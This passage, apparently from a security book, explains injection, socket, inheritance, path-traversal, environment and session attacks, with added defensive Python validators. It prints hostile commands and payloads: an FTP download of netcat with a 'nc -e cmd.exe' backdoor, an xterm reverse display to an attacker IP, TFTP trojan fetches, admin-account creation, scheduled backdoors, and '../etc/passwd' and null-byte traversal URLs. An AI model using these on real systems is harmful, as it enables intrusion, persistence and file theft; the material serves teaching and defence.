A good example script is an FTP script for Windows. The FTP client almost always exists, and can be automated. FTP scripts can cause the FTP client to connect to a host and download a file. Once the file is downloaded, it can then be executed:

echo anonymous>>ftp.txt
echo root@>>ftp.txt
echo prompt>>ftp.txt
echo get nc.exe>>ftp.txt

This will create an FTP script to download netcat to the target machine (the script supplies the user name and password; the server to connect to is given on the ftp command line, or as an open line at the top of the script). To execute the script, we issue the following command:

ftp -s:ftp.txt

Once netcat is on the machine, we then open a backdoor using the following command:

nc -L -p 53 -e cmd.exe



This opens a listening port on what looks like a DNS zone transfer connection (port 53). This is bound to cmd.exe. By connecting, we get a backdoor.

Using only command injection, we have established a backdoor on the system. Figure 4-8 illustrates the attacker connecting to the port to test the shell. The attacker is presented with a standard DOS prompt. Success.

Figure 4-8. The ultimate goal: a command shell on a remote target.


* Attack Example: Injection and Remote xterms

Moving a backdoor program to a remote system is a heavyweight task. This activity almost always leaves files and an audit trail on the target machine (something that requires cleanup). Sometimes a remote shell is easier to obtain using programs that already exist on the system. Many UNIX systems have X Windows installed, and getting a remote shell from X is much easier than installing a backdoor from scratch. Using the xterm program and a local X server, a remote shell can be spawned to the attacker's desktop.

Consider a vulnerable PHP application script that passes user data to the shell via the following call:

passthru( "find . -print | xargs cat | grep $test" );

If an attacker supplies the following input string

;/usr/X/bin/xterm -ut -display 192.168.0.1:0.0

where the IP address 192.168.0.1 can be any address (and should lead to the attacker's X server, which must accept connections from the target), an xterm is created. The attacker issues the input string and waits. Seconds go by. Suddenly, an xterm window flickers onto the screen, first blank white, then filled with text. Is there a root prompt? In Figure 4-9, the attacker has issued the id command to determine under what user context the attack is operating.

Figure 4-9. Successful attempt to spawn an xterm remotely. The attacker has become user SysMan. This attack is easily stopped with ... installation of the X Windows system.
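The injection above, worked as an added example in Python rather than PHP (not code from the book). vulnerable_command() builds the same string passthru() receives, hardened_command() quotes the user value the way PHP's escapeshellarg() would, and hardened_argv() drops the shell entirely. commands_in() splits a command line at unquoted ;, | and & the way sh would, so you can see which programs each variant runs without executing anything. The function names are this example's own.

```python
import shlex

# Attacker input from the xterm example on the page.
ATTACK_INPUT = ";/usr/X/bin/xterm -ut -display 192.168.0.1:0.0"

def vulnerable_command(test):
    """The string the vulnerable script hands to the shell: raw interpolation."""
    return "find . -print | xargs cat | grep " + test

def hardened_command(test):
    """Same pipeline, but the user value is shell-quoted (what escapeshellarg() does in PHP)."""
    return "find . -print | xargs cat | grep " + shlex.quote(test)

def hardened_argv(test):
    """Best option: no shell at all.  Run grep directly with the user value as one argv
    element; '--' keeps a value starting with '-' from being read as an option."""
    return ["grep", "--", test]

SEPARATORS = {";", "|", "&", "&&", "||"}

def commands_in(shell_line):
    """Split a command line the way sh would: a list of argv lists, one per simple
    command.  Quoting is honoured, so a quoted ';' stays inside its argument."""
    lex = shlex.shlex(shell_line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current = [], []
    for tok in lex:
        if tok in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands

def programs_run(shell_line):
    """argv[0] of every simple command the shell would execute."""
    return [argv[0] for argv in commands_in(shell_line)]

if __name__ == "__main__":
    for name, cmd in (("vulnerable", vulnerable_command(ATTACK_INPUT)),
                      ("quoted", hardened_command(ATTACK_INPUT))):
        print("%-10s %s" % (name, programs_run(cmd)))
    print("argv       %s" % hardened_argv(ATTACK_INPUT))
```

With the attacker's string, the vulnerable variant runs four programs, the last of them /usr/X/bin/xterm; the quoted variant runs three, with the whole string as grep's pattern, and the argv variant never gives the shell a chance to parse the input at all.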


* Attack Example: Injection and Tiny FTP (TFTP)

TFTP is a very simple protocol for moving files. To carry out this attack the attacker must have a TFTP server running somewhere that is accessible to the target machine. The target will make a connection to this storage depot. A backdoor program is a nice thing to have waiting there for deployment. The command would look something like this (on Windows, using double escapes):

"C:\\WINNT\\system32\\tftp -i GET trojan.exe"

(The Windows tftp client expects the server address before the transfer direction, tftp -i host GET file; the server argument is omitted here.)

In this example, trojan.exe could be any file you wish to pull from the depot. TFTP is a useful way to move files. It is one of the few ways to upload new firmware "images" into routers, switches, and cable modems. Adept use of TFTP is a necessity. Recently, worms and other kinds of malicious code have begun using TFTP in multistage attacks.

* Attack Example: Adding a User with Injection

As simple as all these backdoors are, a backdoor on the system may not even be a necessity. By adding a new account, an attacker may end up with plenty of access. A famous example (at least famous on a T-shirt worn around the hacker convention Def-Con) of an attacker adding an account was carried out by convicted criminal hacker Kevin Mitnick, who added the "toor" account (root spelled backward) to unsuspecting target hosts. Using injection under a privileged process, an attacker can add an account to a machine fairly easily. Again, using Windows NT as an example, an account can be added as follows:

"C:\\WINNT\\system32\\net.exe user hax0r hax0r /add"

We can also add the user to the Administrators group:

"C:\\WINNT\\system32\\net.exe localgroup Administrators hax0r /add"

* Attack Example: Scheduling a Process with Injection

Once an account has been added to a machine, it may be possible to schedule jobs subsequently on the remote machine. The standard method makes use of the at utility. On Windows, an attacker might map a drive to the remote system and then deploy a backdoor program. If an administrator session is open to the target, then the attacker simply issues the at command with the remote computer specified.

Here is an example of mapping a drive, placing the file, and scheduling it to run on a remote target:

C:\hax0r>net use Z: \\192.168.0.1\C$ hax0r /u:hax0r
C:\hax0r>copy backdoor.exe Z:\
C:\hax0r>at \\192.168.0.1 12:00A C:\backdoor.exe

Note that at takes the remote computer name, not a share, and that the scheduled command must be a path the remote machine can resolve: the Z: mapping exists only on the attacker's machine, so the job refers to C:\backdoor.exe, where the copy landed on the target's C$ share. At midnight, the spell will be cast. Because of remote procedure calls, Windows computers allow remote control once an administrator session is established.[7]

[7] Note that remote procedure call (RPC) games may come to an abrupt end now that the Blaster worm has caused people to take this risk more seriously.


All in all, shell command injection and related attacks are extremely powerful techniques.

Technique: Plumbing Pipes, Ports, and Permissions

Programs use many methods to communicate with other programs. The communications medium can sometimes be leveraged into an exploit. So, too, can resources that belong to other programs you are communicating with.

Local Sockets

A program may open sockets for communication with other processes. These sockets may not be intended for use by a human user. In many cases when local sockets are used, an attacker who already has a system account can connect to the socket and issue commands. The server program may (incorrectly!) assume that the only thing that connects to the socket is another program. Thus, the human user masquerades as another program (and a trusted one to boot). To audit a system for local sockets, issue the following request:

netstat -an

To find out which process owns the socket, use the following commands:

1. lsof

# lsof -i tcp:135 -i udp:135
COMMAND   PID USER   FD   TYPE     DEVICE SIZE/OFF NODE NAME
dced    22615 root  10u  inet 0xf5ea41d8      0t0  TCP *:135 (LISTEN)
dced    22615 root  11u  inet 0xf6238ce8      0t0  UDP *:135 (Idle)

2. netstat

C:\>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       772
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       796
  TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1148           0.0.0.0:0              LISTENING       216
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       1352
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING       976
  TCP    0.0.0.0:8008           0.0.0.0:0              LISTENING       1460
  TCP    127.0.0.1:8005         0.0.0.0:0              LISTENING       1460
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       1460
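Reading a listing like the one above by hand is how the audit is usually done; the following is an added example (not from the book) that does the same triage in code. It parses a netstat -ano style listing (the sample text is constructed for this example, modelled on the table above) and separates sockets reachable from other hosts from loopback-only sockets, which are the ones any local account can reach and which therefore must still authenticate their peer. The names `Socket`, `parse_netstat_ano` and `audit` are this example's own.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample, modelled on the netstat -ano listing above (not a real capture).
NETSTAT_ANO_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       772
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:8005         0.0.0.0:0              LISTENING       1460
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       1460
  TCP    192.168.0.5:1148       192.168.0.9:445        ESTABLISHED     216
  UDP    0.0.0.0:135            *:*                                    772
"""


@dataclass(frozen=True)
class Socket:
    proto: str
    local_ip: str
    local_port: int
    state: str      # empty for UDP, which netstat prints without a state column
    pid: int


# Proto, local addr:port, foreign addr, optional state, PID. "[::]:135" also parses,
# because the greedy \S+ backtracks to the last ':' before the port digits.
_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+\s+(?:(\S+)\s+)?(\d+)\s*$")


def parse_netstat_ano(text: str) -> list[Socket]:
    """Turn netstat -ano output into records; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            proto, ip, port, state, pid = m.groups()
            rows.append(Socket(proto, ip, int(port), state or "", int(pid)))
    return rows


def accepting_input(rows: list[Socket]) -> list[Socket]:
    """Sockets that take unsolicited data: listening TCP plus every bound UDP socket."""
    return [s for s in rows if s.proto == "UDP" or s.state == "LISTENING"]


def is_loopback(ip: str) -> bool:
    return ip.startswith("127.") or ip == "::1"


def audit(text: str) -> dict[str, list[tuple[str, int, int]]]:
    """Bucket accepting sockets into 'network' (reachable from other hosts) and
    'local' (loopback only). The local bucket is the case the text warns about:
    any account on the machine can connect, so the owning process (the PID)
    must not assume the peer is the trusted program it expects."""
    report: dict[str, list[tuple[str, int, int]]] = {"network": [], "local": []}
    for s in accepting_input(parse_netstat_ano(text)):
        bucket = "local" if is_loopback(s.local_ip) else "network"
        report[bucket].append((s.proto, s.local_port, s.pid))
    return report


if __name__ == "__main__":
    for bucket, entries in audit(NETSTAT_ANO_SAMPLE).items():
        print(bucket, entries)
```

The PID column is what ties a socket back to a process; on a UNIX host the same mapping comes from lsof as shown above, and the loopback-only sockets are the ones to review for peer authentication.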

* Attack Example: Breaking Oracle with Socket Attack

Oracle 9i supports stored procedures. One feature of stored procedures is the ability to load DLL modules and make function calls. This allows a developer to do things like write an encryption library in C++, and then make the resulting library available as a stored procedure. Using stored procedures is a very common practice in large application designs.

The Oracle 9i server listens on TCP port 1530. The listener expects that Oracle will connect and request that it load libraries. There is no authentication on this connection, so by merely being able to connect to the port, a person can act as the Oracle database. Thus, an attacker can make requests of the system just as if the Oracle database were doing so. The result is that an anonymous user can cause any system call on the remote server. This vulnerability was discovered by David Litchfield in 2002 after Oracle's ill-fated "Unbreakable" advertising campaign.[8]

[8] Never throw rocks at a wasp nest.

Process Spawning and Handle Inheritance

A server daemon may spawn (or "fork") a new process for each connected user. If the server is root or administrator, the new process will need to be downgraded to a normal user account prior to execution. Handles to open resources are sometimes inherited by the child process. If a protected resource is already open, the child process will have unfettered access to the resource, perhaps by accident. Figure 4-10 shows how this works.

Figure 4-10. Diagram of child process inheritance of a protected resource. This is a tricky problem that is often carried out incorrectly by developers.

This type of attack is most useful as a privilege escalation method. It requires an existing account and knowledge of the open pipe. In some cases, code must be injected into the target process by adding a shared library, performing a remote thread injection, or possibly overflowing a buffer. By doing this, the attacker can access the open handles using their own instructions.
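The inheritance problem in Figure 4-10 is easy to reproduce and just as easy to fix at the spawn call. The following is an added example, not from the book, that opens a stand-in for a protected resource, spawns a child the sloppy way (handle marked inheritable, no descriptor cleanup) and the corrected way (non-inheritable handle, all descriptors above stderr closed), and reports whether the child could use the handle. It assumes a POSIX host and Python 3.9 or later; the names `child_can_use_fd`, `inheritable_fds` and `demo` are this example's own.

```python
from __future__ import annotations

import os
import subprocess
import sys
import tempfile

# Child-side probe: exit 0 only if the descriptor it is handed is open in the child
# AND refers to the same file as in the parent (device and inode are passed along, so
# an unrelated file that happened to reuse the number does not count as a leak).
CHILD_PROBE = """\
import os, sys
fd, dev, ino = (int(a) for a in sys.argv[1:4])
try:
    st = os.fstat(fd)
except OSError:
    sys.exit(1)
sys.exit(0 if (st.st_dev, st.st_ino) == (dev, ino) else 1)
"""


def child_can_use_fd(fd: int, leak: bool) -> bool:
    """Spawn a child and report whether it inherited the open descriptor `fd`.

    leak=True reproduces the sloppy server: the handle is marked inheritable and the
    spawn leaves extra descriptors open. leak=False is the corrected form: the handle
    is non-inheritable and close_fds drops everything above stderr in the child.
    """
    st = os.fstat(fd)
    os.set_inheritable(fd, leak)
    result = subprocess.run(
        [sys.executable, "-c", CHILD_PROBE, str(fd), str(st.st_dev), str(st.st_ino)],
        close_fds=not leak,
        check=False,
    )
    return result.returncode == 0


def inheritable_fds(limit: int = 256) -> list[int]:
    """Audit helper: open descriptors above stderr that would survive fork/exec as-is."""
    leaky = []
    for fd in range(3, limit):
        try:
            if os.get_inheritable(fd):
                leaky.append(fd)
        except OSError:
            pass  # descriptor not open
    return leaky


def demo() -> tuple[bool, bool]:
    """Open a stand-in for a protected resource, then spawn a child both ways."""
    fd, path = tempfile.mkstemp()  # constructed "protected" file, removed afterwards
    try:
        os.write(fd, b"protected contents")
        leaked = child_can_use_fd(fd, leak=True)
        closed = child_can_use_fd(fd, leak=False)
    finally:
        os.close(fd)
        os.unlink(path)
    return leaked, closed


if __name__ == "__main__":
    print("child could use handle (sloppy, fixed):", demo())
```

The privilege drop the text mentions belongs in the same place: a child that is downgraded to a normal account but still holds the parent's open handle has not really been downgraded, so close or un-inherit the handle before (or as part of) the spawn, and use `inheritable_fds` as a check in the parent before it forks.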

Permissions Inheritance and Access Control Lists (ACLs)

ACLs are a commonly encountered security mechanism. The problem is that ACLs are extremely hard to manage. This is because setting up coherent ACLs involves imagining what every individual user or group of users may want to do with a given resource. Sometimes things get complicated.

ACLs are, in fact, so complicated that they tend to fail in practice. Simply put, they cannot be properly managed, and security fails if it cannot be managed. ACLs are invariably set incorrectly, and complex auditing tools are required to keep track of settings and to manage them properly. Inevitably an ACL is incorrectly configured on some file or another, and this offers an attack opportunity.

The security descriptor of a process lets the OS know when the process can access a target. Object security descriptors are compared against the ACLs on a target. When a child process is created, some attributes in the security descriptor are inherited and others are not. This can be controlled in a variety of ways. However, because of the resulting complexity, privileges may be granted to the child unintentionally.

Technique: Exploring the File System

The file system of a public server is a busy place. All kinds of data get left around, much like what is left after a busy downtown parade, after which trash is strewn all over the streets. The problem with public servers is that they cannot seem to keep the mess confined.

Some simple things can help. Temporary files should be stored in a secure area away from prying eyes. Backup files should not be left sitting out in the open for anyone to snatch up. It's all really a matter of cleanliness. But let's face it, software can be very sloppy (perhaps a reflection on the slobs we really are). A typical server is usually a breeding ground for garbage data. Copies get made and things get lost. Backups and temporary files are left out in the open. Permissions on directories aren't locked down. As a result, image pirates can just bypass the login to a porn site and directly access competitors' content. A location that is left writable ends up as a stash point for illegal software (is your site a warez server? Have you ever logged in to your UNIX box and discovered 1,400 concurrent downloads of quake3.iso?). Most system administrators have had something like this happen to them at least once.

In general, server software uses the file system extensively. A Web server in particular is always reading and executing files on a system. The more complicated the server, the harder it is to guarantee the security of the file system. There are many Web servers out on the Internet that allow attackers to read or execute any file on the hard drive! The code between the potential determined attacker and the file system is simply a challenging lock begging to be picked. Once an attacker gains access to your storage, you can bet that the attacker will make good use of it.

Let's explore all the layers between an attacker and the file system. Several basic attack patterns are commonly used, such as simply asking for files and getting them. At the very least, the attacker must know something about the structure of the file system, but this is easy because most systems are cookie-cutter images of one another. More advanced tricks can be used to get directory listings and build a map of an unknown file system.

Attack Pattern: User-Supplied Variable Passed to File System Calls

File system calls are very common in software applications. In many cases, user input is consumed to specify filenames and other data. Without proper security control, this leads to a classic vulnerability whereby an attacker can pass various parameters into file system calls.

There are two main categories of input-driven attacks: Buffer overflows are the largest and best-known attack; inserting data into trusted API calls comes in a close second. This attack pattern involves user-supplied data that trickle through software and get passed as an argument to a file system call. Common forms of this attack involve filenames and directory browsing.

Filenames

If the user-supplied data is a filename, an attacker can simply alter the file name. Consider a log file named based on the name of a server. Assume a popular chat program tries to connect to an Internet address (192.168.0.100, for example). The chat program wants to make a log file for the session. It first contacts a DNS server and does a lookup on the IP address. The DNS server returns the name server.exploited.com for the server. After obtaining the name, the chat program makes a log file called server.exploited.com.LOG. Can you see how an attack would exploit this?

Consider what happens if the attacker has penetrated the DNS server on the network. Or, consider that the attacker has the means to poison the DNS cache on the client computer. The attacker now indirectly controls the name of the log file via the DNS name. The attacker could supply a DNS response such as server.exploited/../../../../NIDS/Events.LOG, possibly destroying a valuable log file.

Directory Browsing

Assume a Web application allows a user to access a set of reports. The path to the reports directory looks something like web/username/reports. If the username is supplied via a hidden field, an attacker can supply a bogus username such as ../../../../../WINDOWS. If the attacker needs to remove the trailing string /reports, then the attacker can simply insert enough characters so the string is truncated. Alternatively, the attacker might apply the postfix NULL character (%00) to determine whether this terminates the string.

Attack Pattern: Postfix NULL Terminator

In some cases, especially when a scripting language is used, the attack string is supposed to be postfixed with a NULL character. Using an alternate representation of NULL (i.e., %00) may result in a character translation occurring. If strings are allowed to contain NULL characters, or if the translation does not automatically assume a null-terminated string, then the resulting string can have multiple embedded NULL characters. Depending on the parsing in the scripting language, NULL may remove postfixed data when an insertion is taking place.

Different forms of NULL to think about include

PATH%00
PATH[0x00]
PATH[alternate representation of NULL character]
%00

Attack Pattern: Postfix, Null Terminate, and Backslash

If a string is passed through a filter of some kind, then a terminal NULL may not be valid. Using an alternate representation of NULL allows an attacker to embed the NULL midstring while postfixing the proper data so that the filter is avoided. One example is a filter that looks for a trailing slash character. If a string insertion is possible, but the slash must exist, an alternate encoding of NULL in midstring may be used.

Once again, some popular forms this takes include

PATH%00%5C
PATH[0x00][0x5C]
PATH[alternate encoding of the NULL][additional characters required to pass filter]

* Attack Example: Entrust and Injection

A rather simple injection is possible in a URL:

http://getAccessHostname/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=[insert relative path here][%00][%5C]&ch

This attack has appeared with regularity in the wild. There are many variations of this kind of attack. Spending a short amount of time injecting against Web applications will usually result in a new exploit being discovered.

Attack Pattern: Relative Path Traversal

Usually the CWD for a process is set in a subdirectory. To get somewhere more interesting in the file system, you can supply a relative path that traverses out of the current directory and into other, more interesting subdirectories. This technique saves you from having to supply the fully qualified path (i.e., one that starts from the root). A nice feature of the relative path is that once you hit the root of the file system, additional moves into a parent directory are ignored. This means that if you want to make sure you start from the root of the file system, all you have to do is put a large number of "../" sequences into the injection.

If your CWD is three levels deep, the following redirection will work:

../../../etc/passwd

Note that this is equivalent to

../../../../../../../../../../../../../etc/passwd

Some common injections to think about include

../../../winnt/
..\..\..\..\winnt
../../../../etc/passwd
../../../../../boot.ini




* Attack Example: File Traversal, Query String, and HSphere

These are simple examples, but they illustrate real-world attacks. It's truly astonishing that vulnerabilities like this exist. Problems like these go to show that Web developers are usually far less aware of secure coding and design than regular C programmers.

http:////psoft.hsphere.CP//?template_name=../../etc/passwd

* Attack Example: File Traversal, Query String, and GroupWise

It is interesting to note that this attack requires a postfix NULL:

http:///servlet/webacc?User.html=../../../../../boot.ini%00

* Attack Example: Alchemy Eye Network Management Software File System

Web applications of all shapes and sizes suffer from this problem. Most server software doesn't have a path traversal problem, but in some rare cases one can find a system that performs no filtering at all. We can download files using the following HTTP command:

GET /cgi-bin/../../../../WINNT/system32/target.exe HTTP/1.0

Once this was reported, the company fixed its server. However, as with many situations like this, the problem was not repaired completely. An alternative way to carry out the same attack involves a URL such as

GET /cgi-bin/PRN/../../../../WINNT/system32/target.exe HTTP/1.0

This alternative attack is a good example of why detecting "bad input" can be difficult. Black listing is never as good as white listing.

The target software in question also provides a PHP script-driven interface to the network management program that allows an attacker to retrieve files directly over HTTP:

http://[targethost]/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../hosts

* Attack Example: Informix Database File System

We would be remiss if we failed to throw a popular database into the Hall of Shame. Try this out on an Informix database:

http://[target host]/ifx/?LO=../../../etc/
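The directory-browsing, postfix NULL, backslash and relative path traversal patterns above, and the PRN/.. bypass of a black-list fix, all fail against the same white-list check, which is what the text recommends over black listing. The following is an added example, not from the book, of that check: it decodes the value exactly once, refuses embedded NUL bytes, reserved Windows device names and absolute paths, treats backslash as a separator, and then verifies that the normalized result still lies under the base directory. `resolve_from_root` separately demonstrates the property the text states, that surplus "../" sequences collapse once the root is reached. The device-name list and the names `safe_join`, `rejection_reason` and `PathRejected` are this example's own assumptions.

```python
from __future__ import annotations

import posixpath
from urllib.parse import unquote

# Names Windows resolves as devices in any directory (assumed list for this example).
WINDOWS_DEVICE_NAMES = {"CON", "PRN", "AUX", "NUL",
                        *(f"COM{i}" for i in range(1, 10)),
                        *(f"LPT{i}" for i in range(1, 10))}


class PathRejected(ValueError):
    """Raised when a user-supplied path fails one of the checks in safe_join."""


def resolve_from_root(injection: str) -> str:
    """Show the property from the text: once '..' reaches the root, further parent
    moves are ignored, so any surplus of '../' resolves to the same absolute path."""
    return posixpath.normpath("/" + injection.replace("\\", "/"))


def safe_join(base_dir: str, user_value: str) -> str:
    """Resolve a user-controlled relative path under base_dir, or refuse it.

    Order matters: decode exactly once (apply the check to the representation the
    server will actually use), refuse NUL so a C-level open() cannot see a shorter
    string than the script did, refuse reserved device names and absolute paths,
    then normalize and confirm containment. Nothing here tries to enumerate bad
    patterns; only the final resolved location is allowed or denied.
    """
    decoded = unquote(user_value)
    if "\x00" in decoded:
        raise PathRejected("embedded NUL byte")
    decoded = decoded.replace("\\", "/")          # %5C / backslash is a separator too
    if posixpath.isabs(decoded):
        raise PathRejected("absolute path not allowed")
    for part in decoded.split("/"):
        if part.split(".")[0].upper() in WINDOWS_DEVICE_NAMES:
            raise PathRejected(f"reserved device name in {part!r}")
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    prefix = base.rstrip("/") + "/"
    if candidate != base and not candidate.startswith(prefix):
        raise PathRejected("path escapes the base directory")
    return candidate


def rejection_reason(base_dir: str, user_value: str) -> str | None:
    """None when the value is acceptable, otherwise the reason it was refused."""
    try:
        safe_join(base_dir, user_value)
    except PathRejected as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    # Constructed inputs mirroring the injections listed in the text.
    for value in ("alice/reports/q1.pdf", "../../../../../WINDOWS",
                  "../../../../../boot.ini%00", "..%5C..%5Cwinnt",
                  "PRN/../../../../WINNT/system32/target.exe"):
        print(f"{value!r}: {rejection_reason('/srv/web', value) or 'allowed'}")
```

Two caveats a practitioner should keep in mind: the check must run on the same string the file system call will receive (decode once, after the server's own decoding, never twice), and on a real host the containment test should be done on the canonical path with symbolic links resolved, which `posixpath` alone does not do.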

Technique: Manipulating Environment Variables

Another common source of input to programs (and one that is often overlooked) is environment variables. If an attacker can control environment variables, the attacker can often cause serious harm to a program.

Attack Pattern: Client-Controlled Environment Variables

The attacker supplies values prior to authentication that alter the target process environment variables. The key is that the environment variables are modified before any authentication code is used.

A related possibility is that during a session, after authentication, a normal user is able to modify environment variables and gain elevated access.

* Attack Example: UNIX Environment Variable

Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This means that the attacker must upload the Trojan library to a specific location on the target. As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\172.16.2.100\shared_files\trojan_dll.dll.
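The defence against client-controlled loader variables such as LD_LIBRARY_PATH is to never hand a privileged child the caller's environment at all. The following is an added example, not from the book, that builds a fresh environment from an allow-list before spawning, and spawns a probe child both with the caller's environment and with the scrubbed one to show what each child sees. The caller environment with LD_LIBRARY_PATH set is constructed for the example; the variable lists and the names `scrub_environment`, `loader_overrides` and `child_view_of` are this example's own assumptions, and it assumes a POSIX host.

```python
from __future__ import annotations

import os
import subprocess
import sys
from typing import Mapping

# Variables that steer the dynamic loader, the shell or the interpreter toward
# caller-chosen code. An assumed starting list for this example, not a complete one;
# it is used for reporting, not as the filter.
LOADER_VARS = {
    "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT", "LD_DEBUG", "LD_PROFILE",
    "DYLD_INSERT_LIBRARIES", "DYLD_LIBRARY_PATH",
    "IFS", "BASH_ENV", "ENV", "PYTHONPATH", "PYTHONSTARTUP", "PERL5OPT",
}
# The only variables a privileged helper may receive from its caller (assumed set).
PASSTHROUGH = {"TZ", "LANG", "LC_ALL", "TERM"}
SAFE_PATH = "/usr/bin:/bin"


def loader_overrides(env: Mapping[str, str]) -> list[str]:
    """Names in env that would change which code a child loads; useful to log or alert on."""
    return sorted(k for k in env if k in LOADER_VARS or k.startswith(("LD_", "DYLD_")))


def scrub_environment(untrusted: Mapping[str, str]) -> dict[str, str]:
    """Build a fresh environment from an allow-list rather than deleting known-bad names.

    Deny-listing fails the way the path filters earlier in the chapter do: there is
    always one more spelling. So copy only PASSTHROUGH names (and only values free of
    NUL and newline), then pin PATH to a fixed value.
    """
    clean = {k: v for k, v in untrusted.items()
             if k in PASSTHROUGH and "\x00" not in v and "\n" not in v}
    clean["PATH"] = SAFE_PATH
    return clean


def child_view_of(env: Mapping[str, str], name: str) -> str:
    """Spawn a child with exactly `env` and return what it sees for variable `name`."""
    probe = "import os, sys; print(os.environ.get(sys.argv[1], '<unset>'))"
    done = subprocess.run([sys.executable, "-c", probe, name],
                          env=dict(env), capture_output=True, text=True, check=True)
    return done.stdout.strip()


# Constructed caller environment: the current environment with a loader override added,
# standing in for a user who set LD_LIBRARY_PATH before invoking a privileged program.
ATTACKER_ENV = {**os.environ, "LD_LIBRARY_PATH": "/tmp/trojan_libs"}


def demo() -> tuple[str, str]:
    """What the child sees for LD_LIBRARY_PATH with the raw and the scrubbed environment."""
    unscrubbed = child_view_of(ATTACKER_ENV, "LD_LIBRARY_PATH")
    scrubbed = child_view_of(scrub_environment(ATTACKER_ENV), "LD_LIBRARY_PATH")
    return unscrubbed, scrubbed


if __name__ == "__main__":
    print("loader overrides present:", loader_overrides(ATTACKER_ENV))
    print("child sees (raw, scrubbed):", demo())
```

Setuid binaries get part of this for free because the loader ignores LD_LIBRARY_PATH and LD_PRELOAD for them, but a daemon that accepts environment values over the network (the TELNET case) or forks helpers on behalf of a session does not, which is why the scrub belongs at every privileged spawn.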

Technique: Leveraging Extraneous Variables

In many cases, software may come preset with various parameters set by default. In many cases, these values are set with no regard for security. An attacker can leverage these broken defaults during an attack.

Attack Pattern: User-Supplied Global Variables (DEBUG=1, PHP Globals, and So Forth)

In seriously broken languages like PHP, a number of default configurations are poorly set. Trying these out is only prudent.

In the interest of convenience (laziness?), some programmers may integrate "secret variables" into applications. A secret variable works like a code word. If this secret code word is used, the application opens the vault. An example is a Web application that distinguishes between normal users and administrators by checking for a hidden form variable with a particular value such as ADMIN=YES. This may sound unlikely, but many internally developed Web-based applications used by the world's largest banks operate this way. It is one of the tricks that software auditing teams look for.

Sometimes these types of problems are not intentional on the part of programmers, but rather come from "bad design" in a platform or language. This is the case with PHP global variables.

Attack Example: PHP Global Variables

PHP is a study in bad security. The main idea pervading PHP is "ease of use," and the mantra "d[...] developer go to any extra work to get stuff done" applies in all cases. This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing [...] with preset values, and taking every meaningful variable from a transaction and making it available [...]. [...] of collision with something more technical, the simple almost always dominates in PHP.

One consequence of all this is that PHP allows users of a Web application to override environment [...] with user supplied, untrusted query variables. Thus, critical values such as the CWD and the search [...] can be overwritten and directly controlled by a remote anonymous user.

Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does [...] things:

while($count < 10){
    // Do something
    $count++;
}

Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and [...] trips through the loop will result in an increment of the variable $count. The problem is that the [...] not initialize the variable to zero before entering the loop. This is fine because PHP initializes the [...] declaration. The result is code that seems to function, regardless of badness. The problem is that [...] the Web application can supply a request such as

GET /login.php?count=9

and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg.

Depending on the configuration, PHP may accept user-supplied variables in place of environment [...]. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. [...] variables are of critical importance because they may be used in file or network operations. If a[...]

can supply a new $PATH variable (such as PATH='/var'), the program may be exploitable.

PHP may also take field tags supplied in GET/POST requests and transform them into global variables. [...] the case with the $count variable we explored in our previous example. Consider another example of this problem in which a program defines a variable called $tempfile. [...] attacker can supply a new temp file such as $tempfile = "/etc/passwd". Then the temp file may be erased later via a call to unlink($tempfile);. Now the passwd file has been erased—a bad thing on most OSs.

Also consider that the use of include() and require() first search $PATH, and that using calls may [...] execute crucial programs such as ls. In this way, ls may be "Trojaned" (the attacker can modify [...] to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified.

Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the [...] to a format string buffer overflow.

Technique: Leveraging Poor Session Authentication

Some servers assign a special session ID to a user. This may be in the form of a cookie (as in HTTP), an embedded session ID in HTML href's, or a numerical value in a structure. The user is identified [...] instead of a reasonable form of authentication. The reasons for this architecture may be that the [...] layer doesn't provide a strong authentication mechanism, the user is mobile, or the target system [...] load balanced across an array of servers.

The problem is that the session ID can be used to look up the server-side state of the user in a d[...] memory cache. The session ID is fully trusted. Note that this means that an attacker can leverage [...] requesting resources that are private or confidential. If the system checks only for a valid session [...] attacker may be permitted to see the protected resources.

If an application maintains separate variables for session ID and user ID, then the application may be exploitable if an authenticated user simply changes the session ID. The application will note that [...] credentials—that is, a correct user key is being used. After this check takes place, the application accepts the session ID. However, in a multiuser system, there may be several sessions active at any given time. The attacker can simply change the session ID while still using a correct user key. Thus, the attacker steals sessions that belong to other users. We have witnessed a version of this in a large video conferencing application [...] a financial institution. Once logged in, any user could hijack other user's video streams.

